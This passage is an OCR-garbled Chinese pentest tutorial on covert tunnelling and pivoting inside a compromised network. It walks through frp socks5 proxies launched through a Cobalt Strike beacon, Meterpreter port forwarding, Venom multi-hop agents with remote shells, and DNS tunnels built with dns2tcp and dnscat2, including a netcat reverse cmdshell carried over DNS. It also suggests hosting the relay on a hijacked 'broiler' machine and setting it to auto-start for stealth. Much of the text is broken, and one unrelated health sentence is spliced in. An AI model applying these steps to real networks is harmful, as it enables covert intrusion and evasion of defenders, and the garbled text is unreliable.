max_pool_count = 20 

eo et = 900 


subdomain host = xxxx.online 


客户 端 
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号 服务 端 1P 或 域名 [实战 中 一 般 都 会 直接 用 域名 ] 
rver_addr = frp.xxxx.online 
355 we Um L1 
r port - 7007 


token， 此 处 必须 与 服务 端 保持 一 致 ， 否 则 无 法 建立 连接 
h token = Admin@auth 

图 特权 模式 [特权 模式 下 服务 端 无 需 配 置 ] 

ilege mode = true 

模式 token, 同样 要 与 服务 端 完全 保持 一 致 

vilege token = Admin@privilege 


检查 间隔 与 超时 时 间 
rtbeat_interval = 10 
rtbeat timeout = 30 


AME 【通信 内 容 加 密 传输 ， 有 效 防 止 流量 被 拦截 ] 

| encryption = true 

AES 【传输 内 容 进行 压缩 ， 有 效 减 小 传输 的 网 络 流量 ， 加 快 流量 转发 速度 ， 但 会 额外 消耗 一 些 CPU 资源 
| compression = true 


ote port - 9066 
用 播 件 socks5 代 理 
gin = Socks5 
cks5 连 接口 令 【根据 实际 情况 进行 配置 ] 
plugin user = AnonySec 

; plugin passwd = 1qaz0123 












H 连 接 到 VPS 上 ， 后 台 启 动 frp 服 务 端 。 
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rootQUbuntu:- f 
root@Ubuntu:~/tools/frp 
root@Ubuntu:~/tools/frp 
root@Ubuntu:~/tools/frp 


root@Ubuntu:~# cd tools/frp 

root@Ubuntu:~/tools/frp# nohup TA -c frps.ini & 

[1]. 14020 

root@Ubuntu:~/tools/frp# nohup: ignoring input and appending output to 'nohup.out' 


root@Ubuntu:~/tools/frp# jobs -l 

[1]* 14020 Running nohup ./frps -c frps.ini & 
root@Ubuntu:~/tools/frp# cat frps. log 

2019/10/28 15:18:32 [I] [service.go:139] frps tcp listen on 0.0.0.0:7007 
2019/10/28 15:18:32 [I] [service.go:239] Dashboard listen on 0.0.0.0:6609 
2019/10/28 15:18:32 [I] [root.go:205] Start frps success 
root@Ubuntu:~+/tools/frp# 


客户 端 


将 frpc.exe 与 frpc.ini 传 到 目标 机 的 同一 目录 下 ， 直 接 运行 。 


管理 员 : C:\Windows\systems2 





CG:\Vfrpc.exe -c frpc.ini 

20197/10728 16:25:63 [I] [service.go:234] login to server success, get run id [ec 
27aaf22e75b5061. server udp port [81 

2019/10/28 16:25:03 CI] [proxy manager.go:1441 [ec27aaf22e75b5061 proxy added: [ 





VAL Pal i 16:25:63 [I] [control.go:153] [socks5] start proxy success 


当 frp 客 户 端 启 动 后 ， 是 否 成 功 连 接 ， 都 会 在 frp 服 务 端 日 志 中 查看 到 。 


rooteübuntu:-* cat tools/frp/frps. log 

2019/10/28 15:29:02 [I] [service.go:139] frps tcp listen on 0.0.0.0:7007 
2019/10/28 15:29:02 [I] [service.go:239] Dashboard Listen on @.0.0.0:6609 
2019/10/28 15:29:02 [I] [root.go:205] Start frps success 


2019/10/28 15:41:41 II] [service.go:356] client login info: ip [36. 14.4. :36919] version [0.29.0] hostname [] os [windows] arch [amd64] 
2019/10/28 15:41:42 [I] [tcp.go:65] [e2301b90d335731f] [socks5] tcp proxy listen port [9066] 
2019/10/28 15:41:42 [I] [control.go:406] [e2301b904d335731f] new proxy [socks5] success 





但 如 果 直 接 在 目标 机 的 Beacon 中 启动 frp 客 户 端 ， 会 持续 有 日 志 输 出 ， 并 干扰 该 pid 下 的 其 他 操作 ， 
所 以 可 结合 execute 在 目标 机 无 输出 执行 程序 。 


beacon> sleep 10 
beacon» execute c:/frpc.exe -c c:/frpc.ini 
beacon» shell netstat -ano |findstr 7007 
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Windows 


E s 


» 


Windows 中 可 结合 Proxifier、SSTap 等 工具 ， 可 设置 socks5 口 令 ， 以 此 达到 用 windows 渗 透 工具 横 


向 穿 透 的 效果 。 


@ ssTap Be， 添 加 新 的 代理 服务 器 Ad 


Powered by ht 


小 结 


| SOCKS 5 -| 


fp.. ™ 








„online 





9066 
AnonySec 


igaz@123 


[Default Group v | 
[e 美国 -] 


本 地 代理 所 对 应 的 远程 服务 器 IP, 只 能 输入 | 
一 个 : 


Country: 


附加 路 由 


Add and activate it 





正在 测试 代理 服务 器 . . - X 


[42:01] 正在 测试 TCF 数据 传递 . . . 
[42:01] 连接 到 ss 节点 .. 
[42:01] 

[42:09] 

[42:09] : 

[42:09] 测试 完成 ! -— 
[42:09] NU 
[42:09] UDP 测试 开始 . 

[42:09] 正在 测试 UDP 转发 ,. . 

[42:09] 正在 从 代理 服务 器 请 求 UDP 转发 . . . 
[42:12] 不 能 连接 到 代理 . 

[42:12] 测试 UDP 转发 . . . 未 通过 ! 

[42:12] 测试 完成 ! 

[42:12] NAN 





Frp 的 用 法 比较 灵活 且 运行 稳定 。 如 可 将 fp 服务 端 挂 在 "肉鸡 "上 ， 以 达到 隐蔽 性 ， 也 可 将 客户 端 做 成 
服务 自 启 的 形式 等 ， 实 战 中 可 自由 发 挥 。 
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portftwd 端 口 转发 aa 


E 
^i 


多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结石 ， 通 风 等 。 
伴 发 肥胖 症 、 高 血压 病 、 糖 尿 病 、 脂 代谢 闪 乱 等 多 种 代谢 性 疾病 。 


短 Wd 是 一 款 强 大 的 端口 转发 工具 ， 支 持 TCP，UDP， 支 持 IPV4--IPV6 的 转换 转发 。 并 且 内 
eterpreter。 其 中 exe 单 版 本 源码 如 下 : 


Jigithub.com/rssnsj/portfwd 


192.168.1.5 Debian 
192.168.1.4 Windows 7 
192.168.1.119 Windows 2003 


«ploit(multi/handler) > sessions -1 


ve sessions 


二 二 二 二 二 二 二 二 二 


Name Type Information Connecti 


meterpreter x86/windows  WINO3X64NAdministrator @ WINO3X64 192.168. 


exploit(multi/handler) » sessions -i 1 -c 'ipconfig' 
Running 'ipconfig' on meterpreter session 1 (192.168.1.119) 


S IP Configuration 


rnet adapter 本 地 连接 ; 

Connection-specific DNS Suffix 

SS oe ,L92168: 1:119 
Meupnet Mask ooo , ses. 255.255.255.0 


Mult Gateway s .... . +, » t 192.168.1.1 
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explortt 


Id Name T: 


meterpreter x 


Windows IP Configuration 


Ethernet adapter 本 地 连接 ; 


ecific DNS Suffix 





靶 机 IP 为 : 192.168.1.119---windows 2003---x64 
需要 转发 端口 为 : 80, 3389 
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msf exploit(multi/handler) » sessions -i 1 
fe] Starting interaction with 1... 


meterpreter > shell 

Process 4012 created. 

Channel 56 created. 

Microsoft Windows [版 本 5.2.3790] 

(C) 版权 所 有 1985-2003 Microsoft Corp. 


C:\Documents and Settings\Administrator\Sim>if defined PSModulePath (echo ok!) t: 
if defined PSModulePath (echo ok!) else (echo sorry!) 
sorry! 


C:\Documents and Settings\Administrator\SiM>net config Workstation 
net config Workstation 


计算 机 名 NNWINO3X64 
计算 机 全 名 win03x64 

RPS Administrator 
工作 站 正 运行 于 


Netbiossmb (000000000000) 
NetBT_Tcpip_{37C12280-A19D-4D1A-9365-6CBF2CAE5B07} (000C2985D67D) 


软件 版 本 Microsoft Windows Server 2003 
工作 站 域 WORKGROUP 

登录 域 WINO3X64 

COM 打开 超时 ( 秒 ) 0 

COM 发 送 计数 ( 字 节 ) 16 

COM 发 送 超时 (毫秒 ) 250 

命令 成 功 完成 。 


C:\Documents and Settings\Administrator\ 桌 面 >netstat -an|findstr "LISTENING" 
netstat -an|findstr "LISTENING" 


TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:3078 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:9001 0.0.0.0:0 LISTENING 
TCP 127.0.0.1:2995 9.0.0.0:0 LISTENING 
TCP 127.0.0.1:9000 0.0.0.0:0 LISTENING 
TCP 127.0.0.1:9999 0.0.0.0:0 LISTENING 
TCP 192.168.1.119:139 0.0.0.0:0 LISTENING 
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msf exploit(multi handle 
I*] Starting interaction with 


meterpreter » shell 
Process 4012 created. 
Channel 56 created. 
Microsoft Wind 

(C) MERA 


C:\Documents and Settings\Administratar\szimzif defined PsModulePath (echo ok!) else (echo sorry!) 
f ed PSModulePath (echo ok!) else (echo sorry!) 


uments and Settings \Administratar\sé fi snet config Workstation 
ynfig Workstation 
ANWINO3XGA 


NetBT B 
软件 版 本 


工作 站 域 


A a 


Jocuments and S ngs\Administraton\ 点 面 >netstat -an|findstr "LISTENING" 
t -an|finc ^ ENING" 

: MC | LISTENING 

3.0.0, 0:0 LISTENING 
9 Q LISTENING 
0 LISTENING 
Q LISTENING 
LISTENING 

ISTENING 

LISTENING 

LISTENING 

LISTENING 

LISTENING 

LISTENING 


ome 


£ 


© © 
Qo Go:toxr«c 


O OG 


~ 
) (3 OO 


a Q 
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meterpreter > portfwd -h 
Usage: portfwd [-h] [add | delete | list | flush] [args] 


OPTIONS: 


-L «opt» Forward: local host to listen on (optional). Reverse: local host t 
-R Indicates a reverse port forward. 

-h Help banner. 

-i «opt» Index of the port forward entry to interact with (see the "list" c 
-1 «opt» Forward: local port to listen on. Reverse: local port to connect t 
-p «opt» Forward: remote port to connect to. Reverse: remote port to lister 
-r «opt» Forward: remote host to connect to. 


portfwd -h 
[-h} [add | delete | last | flush] [args] 


Forward: local host to listen on (optional). Reverse: local host to connect to. 
Indica a reverse port forward. 

Help banner. 

Index of the port forward entry to interact with (see the "list" command). 
Forward: local port to listen on. Reverse: local port to connect to. 

Forward: remote port to connect to. Reverse: remote port to listen on. 

Forward: remote host to connect to. 





meterpreter > portfwd add -1 33389 -r 192,168.1.119 -p 3389 
[*] Local TCP relay created: :33389 «-» 192.168.1.119:3389 
meterpreter » portfwd add -1 30080 -r 192.168.1.119 -p 80 
[^] Local TCP relay created: :30080 <-> 192.168.1.119:80 
meterpreter » portfwd 


Active Port Forwards 


Index Local Remote Direction 
1 0.0.0.0:33389 192.168.1.119:3389 Forward 
2 0.0.0.0:30080 192.168.1.119:80 Forward 


2 total active port forwards. 


neterpreter > porttwd add - 
[*] Local TCP relay created: 


meterpreter > portfwd add -l 300% 1.119 -p 86 
[*] Local TCP relay created: :30080 <-> 192.168.1.119:80 





967 


meterpreter > portfwd 


Remote 


2 total active port 





root@John:~# netstat -ntlp |grep :3 
tcp 9 0 0.0.0.0:33389 
tcp 0 0 0.0.0.0:30080 


-# netstat -ntlp |grep <3 


0 0.0.0.( 


Direction 


Forward 
Forward 


(este dol odo] 


ugue 


LISTEN 
LISTEN 


RP: l 
wA P): | 


取消 | ano >| 
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LISTEN 
LISTEN 





^O MENSES ee 
mM EE 


D q | @ 192. 168. 1.5: 30080 1 


建设 中 
您 想 要 查看 的 站 点 当前 没有 默认 页 。 可 能 正在 对 它 进行 升级 和 醒 置 操作 。 





请 稍 后 再 访问 此 站 点 。 如 果 您 仍然 时 到 问题 ， 请 与 网 站 的 管理 员 联 系 。 
如 果 您 是 网 站 的 管理 员 ， 并 且 认 为 您 是 由 于 错误 才 收 到 此 消息 ， 请 参阅 IIS 
帮助 中 的 "启用 和 禁用 动态 内 容 "。 
SAW IIS Bay 
， 单 击 开始 ， 然 后 单 击 运行 。 
.在 打开 文本 框 中 ， 和 键入 inetmero 将 出 现 IIS BIS 


2 
3， 从 帮助 菜单 ， 单 击 帮 助 主题 。 
4. BHInternet 信息 服务 。 
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Venom -代理 转发 、 多 级 穿 透 





多 级 代理 ， 端 口 转发 以 及 端口 复 用 工具 且 可 管理 切换 节点 ， 定 位 类 似 于 Termite (或 者 说 是 go 语言 的 
Termite) ， 多 平台 适用 。 本 地 测试 环境 ， 流 量 效 果 以 及 稳定 性 优 ， 实 际 环境 下 未 测试 。 


下 载 及 功能 介绍 


下 载 链接 : 


linux 需要 赋予 执行 权限 


chmod +x filename 


admin 端 连接 指令 


监听 : 


admin -lport 8888 
连接 : 

admin -rhost 127.0.0.1 -rport 9999 -passwd 123456 
-passwd A 5 z3j8D8 E EEREH, SESRUAUm[SIET TT BRASS 


agent 端 连 接 指令 


监听 : 
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agent -lport 8888 -passwd 123456 


连接 : 


agent -rhost 127.0.0.1 -rport 9999 


admin 端 内 置 指令 


help Help information. 

exit EXILE, 

show Display network topology. 

getdes View description of the target node. 

setdes [info] Add a description to the target node. 

goto [id] Select id as the target node. 

listen [lport] Listen on a port on the target node. 

connect [rhost] [rport] Connect to a new node through the tar 

sshconnect [user@ip:port] [dport] Connect to a new node through ssh tur 

shell Start an interactive shell on the tar 

upload [local_file] [remote_file] Upload files to the target node. 

download [remote file] [local file] Download files from the target node. 

socks [lport] Start a socks5 server. 

lforward [lhost] [sport] [dport] Forward a local sport to a remote dpc 

rforward [rhost] [sport] [dport] Forward a remote sport to a local dpc 
4 » 


介绍 几 个 使 用 中 没有 实力 的 功能 ， 其 余 在 实例 中 展示 
* socks 建立 到 某 节 点 的 socks5 代 理 


实际 使 用 过 程 中 ， 目 标 机 器 开启 socks， 有 时 候 会 显示 不 支持 的 问题 ， 因 此 放 在 此 处 展示 


(node 1) >>> socks 7777 
a socks5 proxy of the target node has started up on local port 9999 


执行 成 功 socks 命 令 之 后 ， 会 在 admin 节 点 本 地 开启 一 个 端口 ， 如 上 述 的 9999， 使 用 9999 即 可 进行 
Socks5 代 理 


* Iforward/rforward 将 本 地 端口 转发 到 远程 /将 远程 端口 转发 到 本 地 


lforward 将 admin 节 点 本 地 的 8888 端 口 转发 到 node1 的 8888 端 口 


(node 1) >>> lforward 127.0.0.1 8888 8888 
forward local network 127.0.0.1 port 8888 to remote port 8888 


rforward 将 node1 网 段 的 192.168.0.1 端 口 8889 转 发 到 admin 节 点 本 地 的 8889 端 口 
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(node 1) >>> rforward 192.168.0.1 8889 8889 » 
forward remote network 192.168.1.1 port 8889 to local port 8889 


使 用 介绍 


结构 介绍 
admin (listen) «---- agent(node :) 
ne agent(node 2) 
ee agent(node 3) 
| 
二 agent(node :) 
服务 端 : 


./admin linux x64 -lport 9999 


:-4 ./admin linux x64 -lport 9999 
Venom Admin Node Start... 


Cadmin node) »»» 

[-]Remote connection: 

[+]A new node connect to admin node success 
Cadmin node) >>> show 

A 

+ -- 1 





客户 端 (node 1): 


./agent linux x64 -rhost 192.168.0.1 -rport 9999 










»-$ ./agent linux x64 -rhost $m T. 
2019/12/04 09:37:09 [+]Successfully connects to a new node 


服务 器 : 
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4 进入 node 1 
goto 1 

# 设置 描述 
setdes Client 


getdes 
4 监听 node 1 的 10000 端 口 
listen 1000 


(node 1) »»» goto 1 

node 1 

(node 1) >>> setdes client 
(node 1) >>> getdes 

client 

(node 1) >>> Listen 10000 
listen 10000 


the port 10000 is successfully listening on the remote node! 
(node 1) »»» show 
A 
+ -- 1 
+ -- 2 
(node 1) >>> |l 





客户 端 (node 2) 


## 连接 node 1 
./agent.exe -rhost 192.168.1.1 -rport 10000 


.Nagent.exe i] 10000 


:02:28 L[*]Successfully connects to a new node 





服务 器 : 创建 node 2 的 shell 


goto 2 
shell 
>>> whoami 


>>> ipconfig 
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(node 1) >>> goto 2 

node 2 

Cnode 2) >>> shell 

You can execute commands in this shell :D, 'exit' to exit. 
Microsoft Windows [@}} 10.0.18363.418] 

(c) 2019 Microsoft CorporationO000000000E 6666 


C: NS um b»whoami 
whoami 
d 


ipconfig 


Windows IP 6666 


66600 Ethernet: 


6,600 DNS 600 . . . . . . . : localdomain 
660600 IPvo 660 . . : 

00. . . a Uh ues 

00000000 ... 011. 255.255.255.0 
1666606. Pn SE 








66, 666606600 660600600600: 


yee” ......: yooov00000 
60000,0600. DNS 6n . uade 








结构 介绍 
admin(connect) ---- VPS(listen/node 1) <----- agent(node 2) 
T agent(node :) 


---- agent(listen/ node 4) 


主要 通过 VPS 做 中 转 ，admin 在 本 地 即 可 


VPS 端 (node 1) : 监听 端口 


./agent linux x64 -lport 12222 


c ype: ~# ./agent linux x64 -lport 12222 
2019/12/04 18:11:01 [+]Remote connection 
2019/12/04 18:11:01 [+]A new node successfull 
2019/12/04 18:11:44 [+]Remote connection 


2019/12/04 18:11:44 [+]A new node successfully connects to this node 
2019/12/04 18:12:13 [+]Remote connection: í 
2019/12/04 18:12:13 [+]A new node successfully connects to this node 
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客户 端 (node 2) : 


./agent. linux x64 -rhost 192.168.0.1 -rport 12222 











user@user:~$ ./agent linux x64 -rhost 
2019/12/04 10:11:01 [+]Successfully connects to a new node 


客户 端 (node 3) : 


.Nagent.exe -rhost 192.168.0.1 -rport 12222 


TI NN «top? . \agent. exe m EUM 
0019/12/04 18:11:44 i*iSuccessfully connects to a new node 





adminim : 


admin.exe -rhost 192.168.0.1 -rport 12222 
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DNS 隧道 
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dns 隧道 之 dns2tcp 
前 言 


在 渗透 测试 工作 中 ， 经 常会 碰 到 web 入 口 机 或 内 网 主机 无 论 使 用 CP、UDP 都 无 法 使 其 上 线 c2 服 务 
端 ， 而 且 web 入 口 主机 被 层 层 waf 保 护 ，reg、abtts、tunna 等 HTTP 代 理 都 无 法 使 用 的 情况 。 





但 是 如 果 这 人 台 主 机 可 以 解析 域名 ， 或 者 可 以 ping 出 互联 网 域名 指向 ip， 此 时 不 妨 试 试 通 过 dns 协议 
进行 内 网 流量 传输 。 ”自从 cobalt strike dns 出 网 方式 的 加 入 ， 越 来 越 多 人 了 解 并 使 用 通过 dns 协议 
建立 隧道 并 进行 内 网 数据 传输 ,因为 dns 流量 更 加 隐蔽 ， 防 火 墙 拦截 概率 低 。 ”本 系列 文章 将 会 介绍 
三 种 dns 隧道 工具 ，iodline、dnscat、dns2tcp， 之 所 以 选择 这 三 个 工具 做 讲解 ， 是 因为 这 三 种 工具 
都 有 自己 的 独特 之 处 ， 且 这 三 种 工具 客户 端 (被 控 端 ) 程 序 均 有 linux 和 Windows 版 本 。 


使 用 dns 隧 道 ， 首 先 需要 了 解 dns 隧 道 传输 的 原理 。 ”Dns 隧道 需要 将 域名 (通常 为 子 域名 ) 解 析 的 记 
录 包 全 部 传送 给 A 记录 指向 的 服务 器 ， 之 后 所 指向 dns 服 务 器 对 数据 包 进行 解 包 - 解 析 。 ”所 以 需要 
准备 一 个 域名 ， 并 且 添 加 一 条 NS 记录 ， 并 且 为 这 条 NS 记录 添加 对 应 的 A 记 录 指 向 。 ” 故 使 用 dns 隘 
道 工具 ， 只 需 配置 两 条 dns 记 录 。 — 关于 DNS 各 种 记录 类 型 ， 可 查看 

(https://ww 
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A 记 录 E .. 


(1) 什么 情况 下 会 使 用 到 Ai 好 ?> 


ARE TMPISuE, SARINA, 


E 
t 
"E 


zd e 


i 


(2) AiC 妊 的 湛 加 方式 





. 
a AR2HN AT: g ER 
x. 
. l= 
. 
成 ， 默 认为 5600 砂 〈【TTL 为 缓存 时 间 ， 数 价 越 小 ， 烽 改 记 录 务 地 生效 时 间 越 饼 ) 





NS 记录 


(1) 什么 情况 下 会 用 到 NS 记录 ? 





配置 A 记 录 的 目的 是 告诉 dns 服务 器 ， 某 个 域名 对 应 的 IP 是 谁 。 ”配置 NS 记录 的 目的 是 在 指定 某 
个 子 域名 的 DNS 服务 器 。 


例如 域名 "baodu.com"， 添 加 NS 记录 类 型 的 解析 ， 主 机 记录 值 为 "hi"， 记 录 值 
为 "dns.baodu.com'"。 则 此 记录 生效 后 ， 所 有 关于 "hi.baodu.com" 及 其 子 域名 的 DNS 查询 ， 都 会 找 


DNS 服务 器 "dns.baodu.com'"。 
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Dns2tcp 


Dns2tcp 客 户 端 支持 windows 与 linux 版 本 。 Dns2tcp( 
载 后 进行 编译 安装 


./configure 
make 
make install 


或 者 直接 通过 apt 或 yum 安 装 dns2tcp apt-get install dns2tcp 
dns2tcp 的 配置 文件 ， 保 存在 任意 目录 都 可 以 ， 通 常 保存 在 etc 目 录 。 
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d 


Md 


安装 完毕 后 需 创建 一 份 


JUPE 

























































































































































































































































































































































































dns2tcp 与 ioline、dnscat2 最 大 不 同 之 处 在 于 客户 端 与 服务 端 交互 方向 不 同 ，ioline 客 户 端 与 服务 
端 可 双向 交互 ，dnscat2 为 服务 端 主动 连接 客户 端 、dns2tcg 为 客户 端 主动 连接 服务 端 ， 如 以 下 三 张 
图 对 比 示例 。 | 


€— 
| iodine | 

















lodline 
| dnscat2 | 
ves d am 
dnscat2 
[ dns2tep ] 
———— d 
LIO VPS IR SR 
dns2tcp ”“” ，Dns2tcp 隧 道 端 口 通信 需 预 


先 在 配置 文件 resources 参 数 中 指定 ， 可 指定 多 个 端口 ， 自 定义 命名 对 应 端口 名 称 ， 名 称 在 客户 端 执 
行 命令 时 作为 参数 值 使 用 。 dns2tcp 配 置 文件 示例 如 下 
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即 域名 指向 服务 器 、vps) 执 行 命令 ， 指 定 配置 文件 。 ./dns2tcpd -f 
ins2tcp.conf -F -d 3 
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rootGVM-0-8-ubuntu:-/dns2tcp/serverst ./dns2tcpd -f /etc/dns2tcp.conf -F -d 3 
16:02:07 : Debug options.c:97 Add resource ndsc:127.0.0.1 port 8787 
16:02:07 : Debug socket.c:55 Listening on 0.0.0.0:53 for domain x.i 


Starting Server v0.5.2... 
: Debug main.c:132 Chroot to /tmp 
: Debug main.c:142 Change to user nobody 


root@VM-@-8-ubuntu:~/dns2tcp/server# ./dns2tcpd -f /etc/dns2tcp.conf -FE -d 3 
16:02:09 : Debug options.c:97 Add resource ndsc:127.0.0.1 port 8787 
16:02:09 : Debug socket.c:55 Listening on 0.0.0.0:53 for domain x 

| > 

Starting Server v0.5.2... 

16:02:09 : Debug main.c:132 Chroot to /tmp 

08:02:09 ; Debug main.c:142 Change to user nobody 


dns2tcpc.exe -c -d 1 -1 9098 -r ndsc -z x.domain.com -[ 参 数值 对 应 服务 端 resources 内 
端口 对 应 名 称 ，-c 为 对 数据 压缩 。 如 果 dns2tcp 服 务 端 配置 了 key， 则 命令 为 dns2tcpc.exe -c - 


d 1 -1 9098 -r ndsc -z x.domain.com -k password 


fMintranetNtunnelsProxgToolkits-naster?dns2tcpc.exe ^c -d 1 -] 9898 <r ndsc 
o DNS given, using 192.168.187.2 (first systen preferred DNS server? 
debug level 1 


下 图 为 服务 端 接收 到 客户 站 
UC s ery 
queue.c:341 


requests.c:205 Sending [4214] len = 68 dns id = 0x98d6 v/cAABB2EA 
requests.c:167 Receive query : v/cQXxB3BA dns id = 0xa255 for domain 


queue.c:642 Packet [4215] decoded, data len 9 

queue.c:653 diffs 24 

queue.c:407 Queue : dealing packet 4215 

queue.c:300 Flushing outgoing data 

queue.c:341 queue flush expired data, flush expired req id 0xa255 
requests.c:205 Sending [4215] len = 68 dns id = 0xa255 v/cAABB3EA 
requests.c:167 Receive query : v/cQYBB4BA dns id = 0x736f for domain 
i: as Mu 

queue.c:642 Packet [4216] decoded, data len 6 

queue.c:653 ditt 24 

queue.c:407 Queue : dealing packet 4216 

queue.c:300 Flushing outgoing data 

queue.c:341 queue flush expired data, flush expired req id 0x736f 
requests.c:205 Sending [4216] len = 68 dns id = 0x736f v/cAABBAEA 
requests.c:167 Receive query : v/cQYRBSBA dns id = 0x6896 for domain 


Packet [4217] decoded, data len 6 
dtt 24 
Queue : dealing packet 4217 
Flushing outgoing data 

De 


下 面 示例 使 用 dns2tcp 进 行 nc 转发 、socks 服 务 


使 用 dns2tcp 进 行 nc 转发 





I 


Nc 反弹 cmdshell， 方法 同样 适用 于 linux。 启动 服务 端 dns2tcp， 如 下 图 有 


s Lear dis 









启动 客户 端 dns2tcp， 如 下 图 
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neum 


#8 pete Dm server) 


Create seehet Por tas Ares pPevoi) 
(0.0 NUR ecd 


A) ew View va dump ihe dae 


Che lenge 
Mans Ane TAS Wed 


4 ome t reply 
Lo 345 


Ma lkesae = 


rr devote 
AUER ODS Cent to re 
Hegre she eT AG 


Prgms tee 
«OPNS re dei che pret re 


服务 端 nc 监听 窗口 弹 回 目 标 客户 端 端 cmdshelh 如 下 图 。 


jose ws\ Temp > root 292nspj47yol64ppw3b 
(family 0, port 





Win (pet 3Ordgam\administr 


4sNTemp»ipconfig 


CX 


DNS 2 


fthecneti: 


fet 
192.168.187. $ 30 


192.168. 187. 


利用 dns2tcp 对 目标 进行 socks 代 理 。 


Socks5 有 最 务 使 用 dante 搭 建 服务 端 vps 搭 建 dante socks5 服 务 器 apt-get install dante-server 修改 
dante 配 置 文件 /etc/danted.conf 其 中 internal 根 据 vps 网 卡 和 dns2tcp 配 置 socks5 端 口 更 改 ， 本 次 测试 
使 用 socks5 端 口 为 1080 
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logoutput: /var/log/sockd.log 

internal: ethO port = 1080 

external: ethg 

method: username none 

user.privileged: proxy 

user.notprivileged: nobody 

client pass { 

from: 0.0.0.0/0 port 1-65535 to: 0.0.0.0/0 
} 


pass { 
from: 0.0.0.0/0 to: 0.0.0.0/0 


protocol: tcp udp 
} 


danted start 启动 dante socks 服 务 下 图 为 dns2tcp 配 置 文件 、danted 服 务 监听 端口 情况 。 





root rn 


ntp | grep 1080 
[2 eat 





启动 dns2tcp 服 务 端 

root@iZwz92nspj47yol64ppw3bZ :~/tools/dns2tcp-master/server# ./dns2tcpd 
/dns2tcp.cof -F -d 3 

14:58:42 : Debug options.c:97 Add resource socks5:172.18.29.137 port 
14:58:42 : Debug socket.c:55 Listening on 0.0.0.0:53 for domain x 


Starting Server v0.5.2... 
14:58:42 : Debug main.c:132 Chroot to /tmp 
06:58:43 : Debug main.c:142 Change to user nobody 





启动 dns2tcp 客 户 端 ， 客 户 端 (被 控 端 ) 连 接 服务 端 
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fNintranet^tunnel*ProxgToolkits-naster»dns2tcpc.exe -d 3 -r socksb ~z 


Jos 888 
o DNS given. using 192.168.187.2 «first system preferred DNS server? 
ebug level 3 
Debug socket.c:233 Create socket for dns : '192.168.187.2' 
Listening on port : 888 
lhen connected press enter at any tine to dump the queue 


启动 dns2tcp 客 户 端 ， 客 户 端 (被 控 端 ) 连 接 服务 端 

32 \intranet \tunnel\Proxyloolkits-master>dns2tcpe.exe -d 3 -r socks5 -~z 
" —— -1 886 

o DNS given, using 192.168.187.2 (first system preferred DNS server) 
debug level 3 





Debug Socket.c:233 Create socket for dns : '192.168.187.2* 
istening on port : 888 
lhen connected press enter at any tine to dunp the queue 
之 后 可 以 使 用 socks 代 理工 具 ， 连 接 本 机 的 880 端 口 即 可 代理 至 目标 网 络 环境 。 下 图 为 使 用 


proxifier. 
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Target Time/Status 
wm 15 
^ut = 
ptistics | GR rani 
3 14.56 57] ] j P ads 
piss) Welcome to Proxifier v3 29 


9 Mose sr] 
Optons 


No opbons for SOCKSS are saisie. 


下 图 为 
配置 socks 代 理 


E. Queis aboutpreterencons 





Connection Settings 







Configure Proxy Access to the Internet 


No proxy 








Auto detect proxy settings for thes network 


ise system proswy settings 







$9 Manus! prowy configuration 






HTTP Proay 


Use this proxy server for all protocols 







$SL Prosy 






ETP Proxy 





SOCKS Most. 127.00.) 







SOCKS v4 & SOCKS y5 


Automatic proxy configuration URL 









No proxy for 





Example: moza org. net.ag, 192. 168.1.0/74 






Connections to localhost, 127.00.1, and =) are never proxied. 





Do not prompt for authentication if password is saved 


dns 隧道 之 dnscat2 


mw 
Hi 
端 ， 而 且 web 入 口 主机 被 层 层 waf 保 护 ，reg、abtts、tunna 等 HTTP 代 理 都 无 法 使 用 的 情况 。 
但 是 如 果 这 人 台 主 机 可 以 解析 域名 ， 或 者 可 以 ping 出 互联 网 域名 指向 ip， 此 时 不 妨 试 试 通过 dns 协议 
自从 cobalt strike dns 出 网 方式 的 如 入 ， 越 来 越 多 人 了 解 并 使 用 通过 dns 协议 


Dl 


在 渗透 测试 工作 中 ， 经 常会 磁 到 web 入 口 机 或 内 网 主机 无 论 使 用 TCP、UDP 都 无 法 使 其 上 线 c2 服 务 


进行 内 网 流量 传输 。 


会 介绍 三 种 dns 隧道 工具 ，iodline、dnscat、dns2tcp， 之 所 以 选择 这 三 个 工具 做 讲 
解 ， 是 因为 这 三 种 工具 都 有 自己 的 独特 之 处 ， 且 这 三 种 工具 客户 端 (被 控 端 ) 程 序 均 有 linux 和 


建立 隧道 并 进行 内 网 数据 传输 ,因为 dns 流量 更 加 隐蔽 ， 防 火 墙 拦截 概率 低 。 


本 系列 文章 将 会 介绍 
Dns 隧 道 需要 将 域名 (通常 为 子 域名 ) 解 析 的 记 


Windows 版 本 。 

使 用 dns 隧道 ， 首 先 需要 了 解 dns 隧道 传输 的 原理 。 

录 包 全 部 传送 给 A 记 录 指 向 的 服务 器 ， 之 后 所 指向 dns 服务 器 对 数据 包 进 行 解 包 -解析 。 
所 以 需要 准备 一 个 域名 ， 并 且 添 加 一 条 NS 记录 ， 并 且 为 这 条 NS 记录 添加 对 应 的 A 记 录 指 向 。 


故 使 用 dns 隧道 工具 ， 只 需 配置 两 条 dns 记录 。 





关于 DNS 各 种 记录 类 型 ， 可 查看 (https://ww 
人 A 记录 
(1) MAWR BES AICS? 
a oe eS Ha i: 
(2) AiC 录 的 次 加 方式 
kt 5 kar WEG As = 
ea gi SUA, & Eft 
f XT th = 
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NS 记录 


(D AWR RAMANSICR? 


Lege me gS oe WEAR Een 
* mu m 


(2) NSiCURUSDU T 


配置 A 记录 的 目的 是 告诉 dns 服 务 器 ， 某 个 域名 对 应 的 IP 是 谁 。 配置 NS 记录 的 目的 是 在 指定 某 个 
子 域名 的 DNS 服 务 器 。 
例如 域名 "baodu.com"， 添 加 NS 记录 类 型 的 解析 ， 主 机 记录 值 为 "hi"， 记 录 值 


为 "dns.baodu.com'"。 则 此 记录 生效 后 ， 所 有 关于 "hi.baodu.com'" 及 其 子 域名 的 DNS 查询 ， 都 会 找 
DNS 服务 器 "dns.baodu.com'"。 


此 次 测试 使 用 如 下 图 所 示 腾 讯 云 域名 。 





Dnscat2 


Dnscat2( 


gem install bundler 
bundle install 
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rootGVM-0-8-ubuntu:-/dnscat2/server&t bundle install 

